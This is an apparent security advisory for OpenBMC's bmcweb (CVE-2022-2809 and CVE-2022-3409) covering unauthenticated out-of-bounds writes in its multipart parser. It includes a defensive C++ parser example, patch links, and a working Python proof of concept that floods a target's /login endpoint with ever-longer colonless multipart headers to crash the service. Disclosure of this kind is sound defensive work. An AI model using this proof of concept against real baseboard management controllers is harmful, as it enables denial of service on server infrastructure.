Affected Product
Ecosystem: Other OpenBMC
Package name: bmcweb
Affected versions: 2.12 and earlier
Patched versions: 2.13
Severity
High 8.2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
CWE
CWE-229: Improper Handling of Values
CWE-121: Stack-based Buffer Overflow
CWE-122: Heap-based Buffer Overflow
CVE identifiers
CVE-2022-2809
CVE-2022-3409
Credits
Jakub Rozanski, <[email protected]>
Title
Unauthenticated out of bounds heap and stack writes in bmcweb
Description
While fuzzing the multipart_parser code with AFL++ and AddressSanitizer enabled, looking for the smallest possible memory corruptions, a problem was found in how multipart_parser handles unclosed HTTP headers. If a long enough HTTP header without a colon is passed in the multipart form, there is a one-byte overwrite on the heap. This can be triggered repeatedly in a loop to cause a DoS.
Two vulnerabilities were identified and reported as CVE-2022-2809 & CVE-2022-3409.
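The bug class described above is a multipart header line that is buffered and scanned for a separator that never arrives. The following added example is not bmcweb code and is not the fix linked under Mitigation; it is a hypothetical, bounded parser for the header block of one multipart part, written to show the checks a defender wants: a fixed maximum line length, rejection of a header line that contains no colon, and rejection of a block that ends before the blank line that terminates the headers. Nothing is copied into a buffer until the line has passed those checks. The sample inputs in main() are constructed here.

```cpp
#include <algorithm>
#include <cstddef>
#include <iostream>
#include <string>
#include <string_view>
#include <vector>

// One parsed header of a multipart part (hypothetical type for this example).
struct Header {
    std::string name;
    std::string value;
};

// Hypothetical limit on a single header line; real servers pick their own.
constexpr std::size_t kMaxHeaderLine = 256;

enum class ParseStatus { Ok, MissingColon, LineTooLong, Unterminated };

struct ParseResult {
    ParseStatus status;
    std::vector<Header> headers;
};

// Parses the bytes between the boundary line and the blank line that ends
// the part's headers. Each line is validated before anything is stored, so
// a line that lacks a colon, or that is longer than kMaxHeaderLine, is
// rejected instead of being accumulated into a buffer.
ParseResult parsePartHeaders(std::string_view block) {
    ParseResult result{ParseStatus::Ok, {}};
    std::size_t pos = 0;
    while (pos < block.size()) {
        std::size_t eol = block.find("\r\n", pos);
        if (eol == std::string_view::npos) {
            // Line with no CRLF at all: the header block is not complete.
            result.status = ParseStatus::Unterminated;
            return result;
        }
        std::string_view line = block.substr(pos, eol - pos);
        if (line.empty()) {
            // Blank line: end of headers, everything collected is valid.
            return result;
        }
        if (line.size() > kMaxHeaderLine) {
            result.status = ParseStatus::LineTooLong;
            return result;
        }
        std::size_t colon = line.find(':');
        if (colon == std::string_view::npos) {
            // "name" without ':' is not a header; refuse rather than buffer.
            result.status = ParseStatus::MissingColon;
            return result;
        }
        std::string_view name = line.substr(0, colon);
        std::string_view value = line.substr(colon + 1);
        // Trim optional whitespace after the colon.
        value.remove_prefix(std::min(value.find_first_not_of(" \t"), value.size()));
        result.headers.push_back({std::string(name), std::string(value)});
        pos = eol + 2;
    }
    // Ran out of input before seeing the blank line.
    result.status = ParseStatus::Unterminated;
    return result;
}

int main() {
    // Constructed inputs: a well-formed part header, a header line without
    // a colon, and an over-long line.
    const std::string good = "Content-Disposition: form-data; name=\"f\"\r\n\r\n";
    const std::string noColon = "t-DiPpcccccccc\r\n\r\n";
    const std::string tooLong = std::string(300, 'c') + "\r\n\r\n";
    std::cout << "good: " << static_cast<int>(parsePartHeaders(good).status) << "\n";
    std::cout << "noColon: " << static_cast<int>(parsePartHeaders(noColon).status) << "\n";
    std::cout << "tooLong: " << static_cast<int>(parsePartHeaders(tooLong).status) << "\n";
    return 0;
}
```

The order of the checks matters: the length check runs before the colon search, so an over-long line is refused whether or not it happens to contain a colon, and the only write into the header vector happens after both checks pass.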
Proof Of Concept
import socket
import ssl
import time

HOST = ""  # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB
PORT = 443

# Starting Content-Length; each iteration grows the body by one byte.
length = 322
additional = ""
payload = """POST /login HTTP/1.1\r\nHost: :8080\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\nContent-Length: %s\r\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\r\n\r\n-----------------------------d74496d66958873e\r\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\r\n\r\n"""

if __name__ == "__main__":
    # TLS context without certificate verification (BMCs commonly use
    # self-signed certificates); ssl.wrap_socket was removed in Python 3.12.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    while True:
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        client = context.wrap_socket(client)
        client.connect((HOST, PORT))
        toSend = payload % (str(length), additional)
        print(toSend)
        client.send(toSend.encode('utf-8'))
        print(client.recv(4096))
        client.close()
        time.sleep(0.01)
        length += 1
        additional += "a"
Vulnerability Description
Denial of service.
Affected Release
OpenBMC 2.12 and earlier
Fixed in Release
OpenBMC 2.13
Mitigation
CVE-2022-2809, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796
CVE-2022-3409, https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868
For more information
If you have any questions or comments about this advisory:
- Email us at openbmc-security at lists.ozlabs.org